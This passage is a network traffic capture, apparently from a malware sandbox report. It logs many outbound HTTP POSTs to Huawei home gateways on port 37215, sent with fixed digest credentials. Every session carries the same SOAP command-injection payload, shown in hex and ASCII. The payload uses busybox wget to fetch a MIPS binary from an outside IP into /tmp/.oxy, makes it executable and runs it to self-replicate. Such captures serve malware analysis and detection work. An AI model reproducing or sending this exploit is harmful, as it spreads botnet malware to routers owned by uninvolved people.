6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  145192.168.2.1348990157.217.246.24237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064534903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  146192.168.2.1348922188.112.233.20137215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064554930 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  147192.168.2.1345766197.72.165.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064587116 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  148192.168.2.1345906157.244.76.12837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064604044 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  149192.168.2.1334148157.12.171.3437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064615965 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  150192.168.2.134452841.139.74.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.064620018 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  151192.168.2.135171641.150.112.23237215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065639973 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  152192.168.2.1341046197.45.113.13937215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065645933 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  153192.168.2.1335632157.43.196.21037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065695047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  154192.168.2.135600441.121.243.6437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065695047 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  155192.168.2.133504667.107.171.20537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.065696001 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
